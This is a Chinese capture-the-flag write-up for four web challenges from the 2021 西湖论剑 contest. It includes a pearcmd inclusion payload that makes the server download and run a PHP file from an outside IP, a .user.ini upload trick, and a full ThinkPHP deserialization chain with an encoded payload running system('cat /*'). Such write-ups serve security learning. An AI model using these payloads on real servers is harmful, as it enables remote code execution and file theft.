2021西湖论剑web部分wp

  1. 1. 2021西湖论剑web部分wp
    1. 1.1. OA?RCE?
    2. 1.2.
    3. 1.3. easyupload
    4. 1.4. 灏妹的web
    5. 1.5. EasyTp

2021西湖论剑web部分wp

OA?RCE?

环境没有写的权限,本地有打通环境打不通的情况很多

之后在webmain/index/indexAction.php处

1637457533862.png

有个包含任意php文件

1637457570679.png

有个查看phpinfo的

1637457631140.png

看了之后开着register_argc_argv,尝试包含pearcmd

payload

第一步

1
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2xpYi9waHAvcGVhcmNtZA==&+install+-R+/tmp+http://124.70.40.5/4.php

第二步

1
?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3RtcC9wZWFyL2Rvd25sb2FkLzQ=

1637457884133.png

4.php内容为

1
2
3
<?php
echo "<?php system('/readflag');?>";
?>

easyupload

?source=1看到源码
能上传文件有一些限制

1
2
3
4
5
6
7
if(stristr($filename,'p') or stristr($filename,'h') or stristr($filename,'..')){
die('no');
}
$file_conents = file_get_contents($_FILES['file']['tmp_name']);
if(strlen($file_conents)>28 or stristr($file_conents,'<')){
die('no');
}

文件名不能有p和h,而且内容长度不超过28。
可以上传.user.ini,因为长度不超过28,可以为
auto_prepend_file=”/flag”
使其自动包含/flag,之后找到一个php文件访问就行。


看latte模版会生成一个php缓存文件,且文件生成规则如上图,每个版本文件名固定。
本地搭环境(要在linux),去github上找latte测试。
简单看一下 加密规则为key的md5结果前十位
a:4:{i:0;s:19:”tempdir/index.latte”;i:1;s:6:”版本号”;i:2;a:7:{i:0;s:5:”clamp”;i:1;s:11:”divisibleBy”;i:2;s:4:”even”;i:3;s:5:”first”;i:4;s:4:”last”;i:5;s:3:”odd”;i:6;s:5:”slice”;}i:3;b:1;}
所以生成缓存文件名为index.latte–key加密结果.php
之后在尝试2.10.4的时候有了结果,文件名为index.latte–6f26bb0dba.php
回到题目,构造一个传文件html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>

<h1>hello worlds</h1>
<form action="http://2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezupload-ctf.dasctf.com:2333/" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></p>
<p><input type="submit" value="submit"></p>
</form>

</body>
</html>

先发包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST / HTTP/1.1
Host: 2e878d38-86e3-4b65-9b17-928e7ded6d0a.ezupload-ctf.dasctf.com:2333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------165383841511425975052999558491
Content-Length: 260
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Upgrade-Insecure-Requests: 1

-----------------------------165383841511425975052999558491
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: application/octet-stream

auto_prepend_file="/flag"

-----------------------------165383841511425975052999558491--


提示上传成功
之后访问/tempdir/index.latte–6f26bb0dba.php


DASCTF{a3cb921465600f49b52b9ac907a38edb}

灏妹的web

扫就完事了,访问/.idea/dataSources.xml

DASCTF{09957769e7c24dddefc1ef615539c9ac}

EasyTp

有个file参数,直接读/etc/passwd提示harcker,伪协议读源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php

namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
public function index()
{

if (isset($_GET['file'])) {
$file = $_GET['file'];
$file = trim($file);
$file = preg_replace('/\s+/','',$file);
if(preg_match("/flag/i",$file)){ die('<h2> no flag..');}
if(file_exists($file)){
echo "file_exists() return true..</br>";
die( "hacker!!!");
}else {
echo "file_exists() return false..";
@highlight_file($file);
}

} else {

echo "Error! no file parameter <br/>";
echo "highlight_file Error";
}

}

public function unser(){
if(isset($_GET['vulvul'])){
$ser = $_GET['vulvul'];
$vul = parse_url($_SERVER['REQUEST_URI']);
parse_str($vul['query'],$query);

foreach($query as $value)
{
if(preg_match("/O/i",$value))
{
die('</br> <h1>Hacking?');
exit();
}
}
unserialize($ser);
}

}
}

有个反序列化,要绕parse
https://www.cnblogs.com/tr1ple/p/11137159.html
绕过方法///public/index.php/index/unser?vulvul=
绕过之后网上找条链子就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
namespace think\model\concern{
trait Attribute{
private $data = [7];
}
}

namespace think\view\driver{
class Php{}
}

namespace think{
abstract class Model{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
protected $table;
function __construct($cmd){
$this->lazySave = true;
$this->withEvent = false;
$this->table = new route\Url(new Middleware,new Validate,$cmd);
}
}
class Middleware{
public $request = 2333;
}
class Validate{
protected $type;
function __construct(){
$this->type = [
"getDomainBind" => [new view\driver\Php,'display']
];
}
}
}

namespace think\model{
use think\Model;
class Pivot extends Model{}
}

namespace think\route{
class Url
{
protected $url = 'a:';
protected $domain;
protected $app;
protected $route;
function __construct($app,$route,$cmd){
$this->domain = $cmd;
$this->app = $app;
$this->route = $route;
}
}
}

namespace{
echo urlencode(serialize(new think\Model\Pivot('<?php system("cat /*"); ?>')));
}

payload

1
2
///public/index.php/index/unser?vulvul=
O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A26%3A%22%3C%3Fphp+system%28%22cat+%2F%2A%22%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A7%3B%7D%7D


DASCTF{ee6db14d381babe4f78be657ee473cba}